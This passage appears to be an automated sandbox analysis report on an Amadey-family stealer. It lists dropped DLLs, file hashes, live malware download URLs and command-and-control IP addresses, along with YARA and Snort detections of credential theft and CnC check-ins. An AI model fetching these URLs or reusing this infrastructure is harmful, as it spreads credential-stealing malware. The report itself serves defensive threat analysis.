                                                                                                                                          SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                                                          MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                                                          SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                                                          SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                                                          SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          C:\ProgramData\nss3.dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1246160
                                                                                                                                          Entropy (8bit):6.765536416094505
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                                                                                          MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                                                                                          SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                                                                                          SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                                                                                          SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                                                                                          Malicious:false
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Metadefender, Detection: 0%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                          C:\ProgramData\softokn3.dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):144848
                                                                                                                                          Entropy (8bit):6.539750563864442
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                                                                          MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                                                                          SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                                                                          SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                                                                          SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                                                                          Malicious:false
                                                                                                                                          C:\ProgramData\vcruntime140.dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):83784
                                                                                                                                          Entropy (8bit):6.890347360270656
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                          MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                          SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                          SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                          SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):127488
                                                                                                                                          Entropy (8bit):6.506297388263336
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:WeZmogDk+xTMLObNlEB+VSdQgXHOPz2XrLekm9:WeZkgOThNlIWzo
                                                                                                                                          MD5:985F9C4D8BF231CA08046BCD44D558EB
                                                                                                                                          SHA1:DE5711528D94DAB76186D9695CE19C3C6C26EEC9
                                                                                                                                          SHA-256:78322121578342E588375350F56EDB5E0A6D4B889C6425814590AFD1A967E650
                                                                                                                                          SHA-512:939DED352BF569DDC0EC01C642FB6DDB12D055B8A785FB717DAA63E9E3F141FF13A40291C18DF2D8EA28B2860F91067B9CFD1A740A587B7726D9CB293155E44F
                                                                                                                                          Malicious:true
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred[1].dll, Author: Joe Security
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          IE Cache URL:http://176.111.174.114/Hnq8vS/plugins/cred.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\nss3[1].dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1246160
                                                                                                                                          Entropy (8bit):6.765536416094505
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
                                                                                                                                          MD5:BFAC4E3C5908856BA17D41EDCD455A51
                                                                                                                                          SHA1:8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
                                                                                                                                          SHA-256:E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
                                                                                                                                          SHA-512:2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/nss3.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\sslamlssa[1].json
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):1052
                                                                                                                                          Entropy (8bit):4.8664609935703576
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YuZz2txawqCAxz/IEW4H//yRBex7wHvoB5q/fkrcByHP0/T5O/Azr1yi69uiY:YuAtxFqI74Hny6xEHwBofkrjv0/8A94M
                                                                                                                                          MD5:A8FCF0654540177E2469F3575711B2E3
                                                                                                                                          SHA1:AB44B0CA7E20EE49274BE200E2A2D57BFB6B38D6
                                                                                                                                          SHA-256:D97D910918846775F9849F9BFF9AA93E232A92B6F9A4A891A6A98291D9B848FE
                                                                                                                                          SHA-512:20FB8A5FC5B756889BAB06A138F1B195510F64925FC0C5CBCFCE262219FCC2CEE99A466902D9F507CF143C0AA60C9FB8E00F515446AC1BFE29C9D377CFC87466
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:https://api.faceit.com/core/v1/nicknames/sslamlssa
                                                                                                                                          Preview: {"result":"ok","payload":{"country":"us","registration_status":"active","about":"78.47.81.226|","matches_left":0,"private_tournaments_invitations":{},"user_type":"user","games":{},"matches_not_played":0,"settings":{"language":"en"},"active_team_id":null,"newsletter_promotions":false,"version":4,"created_by":"anonymous","favorite_tournaments":[],"activated_at":"Mon Apr 26 15:50:42 UTC 2021","invitations_remaining":10,"steam_id":"","ongoing_rooms":{},"updated_by":"broker","guid":"b7bc785d-4441-4b1f-9a6e-2cae3a87563a","private_tournaments":[],"status":"AVAILABLE","guest_info":{},"notification_tournament_joined_starts":false,"friends_ids":[],"flag":"","created_at":"Mon Apr 26 15:50:43 UTC 2021","membership":{"type":"free"},"memberships":["free"],"newsletter_general":false,"nickname":"sslamlssa","ongoing_tournaments":{},"socials":{},"website":"","verified":false,"entity_type":"user"},"server_epoch_time":1619643511,"message":"Operation performed correctly.","env":"prod","you_are":{"roles":["
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\mozglue[1].dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):137168
                                                                                                                                          Entropy (8bit):6.78390291752429
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
                                                                                                                                          MD5:8F73C08A9660691143661BF7332C3C27
                                                                                                                                          SHA1:37FA65DD737C50FDA710FDBDE89E51374D0C204A
                                                                                                                                          SHA-256:3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
                                                                                                                                          SHA-512:0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/mozglue.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\vcruntime140[1].dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):83784
                                                                                                                                          Entropy (8bit):6.890347360270656
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                                                                                          MD5:7587BF9CB4147022CD5681B015183046
                                                                                                                                          SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                                                                                          SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                                                                                          SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/vcruntime140.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):440120
                                                                                                                                          Entropy (8bit):6.652844702578311
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                                                                                          MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                                                                                          SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                                                                                          SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                                                                                          SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/msvcp140.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\xsrv2[1].exe
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):290304
                                                                                                                                          Entropy (8bit):6.9441301701352725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:QyRnLkiC4K+lDKzhQd22R+hb8L6COx6bHpk:7IiC4K6H0bK1oIHp
                                                                                                                                          MD5:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          SHA1:712FBB4DF005439B9810090FD3A2962848E252C4
                                                                                                                                          SHA-256:B5A399C0EA40983ABC68B828CCB14EFDE2DB90C047BBFBA9AE418317CE7F036D
                                                                                                                                          SHA-512:937BFD9845CC25A6739B8DF0CAC685C5499F4D55D5F70FFF5CE61A4569B7BE96D84E987E001B8E8109200C485F681BCC86911A29CC5E5E45B978DBACE7DA2CE3
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          IE Cache URL:http://ukedocumentary.com/wp-content/themes/cinestar/extendvc/xsrv2.exe
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\freebl3[1].dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):334288
                                                                                                                                          Entropy (8bit):6.807000203861606
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
                                                                                                                                          MD5:EF2834AC4EE7D6724F255BEAF527E635
                                                                                                                                          SHA1:5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
                                                                                                                                          SHA-256:A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
                                                                                                                                          SHA-512:C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/freebl3.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\scr[1].dll
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):227328
                                                                                                                                          Entropy (8bit):6.551095959374544
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:SJ+WK/pvT7arfwKFzDTsv5oaTh45CjBscX9TlHN:JJpb7Y7vf5i5X9TFN
                                                                                                                                          MD5:A48DC2DA2655FD049E37E36FCDA28FBA
                                                                                                                                          SHA1:96CE27AB5FEC62C6AC3ED96DD1BDC2DEFAD5499E
                                                                                                                                          SHA-256:76F6C712403A2F6213390AB2A72A82C98C9C48E1B1BDE182AA5932BD02A06D43
                                                                                                                                          SHA-512:37AD66440213CC29EC658158151366AFD077A2FF941323B4190279A4344F1B4C55109A5CF80B96ABD9BD4D07741A8CDAEC5D3651C53B0DD87F2E720C73264490
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          IE Cache URL:http://176.111.174.114/Hnq8vS/plugins/scr.dll
                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\softokn3[1].dll
                                                                                                                                          Process:C:\Users\user\Desktop\wKYTg7Gp6P.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):144848
                                                                                                                                          Entropy (8bit):6.539750563864442
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
                                                                                                                                          MD5:A2EE53DE9167BF0D6C019303B7CA84E5
                                                                                                                                          SHA1:2A3C737FA1157E8483815E98B666408A18C0DB42
                                                                                                                                          SHA-256:43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
                                                                                                                                          SHA-512:45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
                                                                                                                                          Malicious:false
                                                                                                                                          IE Cache URL:http://78.47.81.226/softokn3.dll
                                                                                                                                          C:\Users\user\AppData\Local\Temp\152138533219.jpg
                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1280x1024, frames 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4768287
                                                                                                                                          Entropy (8bit):7.896086900501099
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:49152:PZtZtZtZtZtZtZJ4JcAUu0ZtZR3ZR3ZR3ZR3ZR3Z2ZR3ZR3Blc55vBZR3ZR3ZR3f:x333333J4m4i3HHHHHUHZc55v7HHH1
                                                                                                                                          MD5:6EB928BE746DF50A2951EB079E168219
                                                                                                                                          SHA1:D612C16BF5B516F64BA45849527BBF81D3948623
                                                                                                                                          SHA-256:45E57ABD87A31D0A8EA3F4D0DF01F529A89A4E3735D85BD166F4F5C68121F9C6
                                                                                                                                          SHA-512:E59AF8EE06244AD882D03E66DEE06A584D456DF0061B77B03A44C53989D8A13BE419C8AD2DC6B94C6111C60A8430733EAE1C6AA8A41FC30B2EEFFC066F8300D0
                                                                                                                                          Malicious:false
                                                                                                                                          C:\Users\user\AppData\Local\Temp\15213853321935212556
                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          File Type:empty
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):0
                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3::
                                                                                                                                          MD5:D41D8CD98F00B204E9800998ECF8427E
                                                                                                                                          SHA1:DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
                                                                                                                                          SHA-256:E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
                                                                                                                                          SHA-512:CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:
                                                                                                                                          C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          Process:C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):290304
                                                                                                                                          Entropy (8bit):6.9441301701352725
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:QyRnLkiC4K+lDKzhQd22R+hb8L6COx6bHpk:7IiC4K6H0bK1oIHp
                                                                                                                                          MD5:31AB82365078548DCEA62DA7C2380B2E
                                                                                                                                          SHA1:712FBB4DF005439B9810090FD3A2962848E252C4
                                                                                                                                          SHA-256:B5A399C0EA40983ABC68B828CCB14EFDE2DB90C047BBFBA9AE418317CE7F036D
                                                                                                                                          SHA-512:937BFD9845CC25A6739B8DF0CAC685C5499F4D55D5F70FFF5CE61A4569B7BE96D84E987E001B8E8109200C485F681BCC86911A29CC5E5E45B978DBACE7DA2CE3
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                          Entropy (8bit):7.707494278122921
                                                                                                                                          TrID:
                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                                                                                          • Clipper DOS Executable (2020/12) 0.02%
                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                          • VXD Driver (31/22) 0.00%
                                                                                                                                          File name:wKYTg7Gp6P.exe
                                                                                                                                          File size:573952
                                                                                                                                          MD5:c4c7d74ca7c0fc1511a82b040a274549
                                                                                                                                          SHA1:b0b1f42d887a07d4bfae6b1e63900bad822b0908
                                                                                                                                          SHA256:84343112791c187d10af9cea8fac68cf4fc03d72352f1fe2def0bf72f9a9afc7
                                                                                                                                          SHA512:b80b2ed76607715f3660626151b8445d28bc5a87e33cdd91a1750341b3b7f94f2b0dbb13d17246e1fbe6f1a53299c31cfbfc5c9d49c27542c2cd27cac5c3e558
                                                                                                                                          SSDEEP:12288:2iUfDc6TRMmHKj+ZOZhFTCnegEey4UI7hSux8eE8NE:jC/BqjSOfFTCLxFjyH8NE

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:dab1e4c0ecb9c7b8

                                                                                                                                          Static PE Info

                                                                                                                                          General

                                                                                                                                          Entrypoint:0x402649
                                                                                                                                          Entrypoint Section:.text
                                                                                                                                          Digitally signed:false
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          Subsystem:windows gui
                                                                                                                                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                                          Time Stamp:0x5E36CEE3 [Sun Feb 2 13:30:11 2020 UTC]
                                                                                                                                          TLS Callbacks:
                                                                                                                                          CLR (.Net) Version:
                                                                                                                                          OS Version Major:5
                                                                                                                                          OS Version Minor:0
                                                                                                                                          File Version Major:5
                                                                                                                                          File Version Minor:0
                                                                                                                                          Subsystem Version Major:5
                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                          Import Hash:330a62607dc728cb3596dbc4235ea785

                                                                                                                                          Entrypoint Preview

                                                                                                                                          Instruction
                                                                                                                                          call 00007F30F4FFA95Bh
                                                                                                                                          jmp 00007F30F4FF675Eh
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
                                                                                                                                          int3
Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb376c | 0x50 | .new
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb5000 | 0x17f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb7000 | 0x16f0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb2a98 | 0x18 | .new
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2a50 | 0x40 | .new
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb0000 | 0x198 | .new
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x7f28d | 0x7f400 | False | 0.89262992694 | data | 7.88074668674 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data | 0x81000 | 0x2c1d8 | 0x4e00 | False | 0.0998096955128 | data | 1.18468072777 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.mijoza | 0xae000 | 0x179 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls | 0xaf000 | 0x9 | 0x200 | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.new | 0xb0000 | 0x40c8 | 0x4200 | False | 0.376893939394 | data | 5.34015207286 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xb5000 | 0x17f8 | 0x1800 | False | 0.70361328125 | data | 6.0156191445 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb7000 | 0x1d6a | 0x1e00 | False | 0.627994791667 | data | 5.75714521169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0xb5130 | 0x10a8 | data | English | United States
RT_STRING | 0xb63a8 | 0x44c | data | Uzbek | Cyrillic
RT_GROUP_ICON | 0xb61d8 | 0x14 | data | English | United States
RT_VERSION | 0xb61f0 | 0x1b8 | COM executable for DOS | |

Imports

DLL | Import
KERNEL32.dll | FreeLibrary, SystemTimeToTzSpecificLocalTime, InterlockedIncrement, GetConsoleAliasA, GetModuleHandleExW, ConnectNamedPipe, GetTickCount, SetFileTime, TerminateThread, GetLocaleInfoW, SetSystemTimeAdjustment, GetFileAttributesA, GetTimeFormatW, SetTimeZoneInformation, GetAtomNameW, FindResourceW, RaiseException, SetLastError, GetProcAddress, OpenWaitableTimerA, LocalAlloc, SetConsoleOutputCP, GlobalFindAtomW, SetConsoleCursorInfo, GetModuleHandleA, LoadLibraryExA, FindAtomW, FileTimeToLocalFileTime, GetCurrentProcessId, CompareStringW, CompareStringA, lstrcatA, MapViewOfFile, GetModuleHandleW, Sleep, ExitProcess, GetStartupInfoW, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, GetCurrentThread, WriteFile, GetStdHandle, GetModuleFileNameA, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, SetConsoleCtrlHandler, InterlockedExchange, LoadLibraryA, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, HeapCreate, HeapDestroy, VirtualFree, QueryPerformanceCounter, GetSystemTimeAsFileTime, VirtualAlloc, HeapReAlloc, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, WideCharToMultiByte, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeFormatA, GetDateFormatA, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, GetTimeZoneInformation, SetEnvironmentVariableA
USER32.dll | GetDesktopWindow
ADVAPI32.dll | RegCreateKeyW

Version Infos

Description | Data
LegalCopyright | Wsekde
InternalName | sgalimatimot
FileVersion | 7.0.2.54
ProductVersion | 7.0.21.21
Translations | 0x0138 0x1ff3

Possible Origin

Language of compilation system | Country where language is spoken
English | United States
Uzbek | Cyrillic

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/28/21-22:58:52.372241 | TCP | 2021697 | ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious | 49744 | 80 | 192.168.2.4 | 89.184.92.210
04/28/21-22:59:10.222388 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49750 | 80 | 192.168.2.4 | 176.111.174.114
04/28/21-22:59:10.540480 | TCP | 2027700 | ET TROJAN Amadey CnC Check-In | 49752 | 80 | 192.168.2.4 | 176.111.174.114
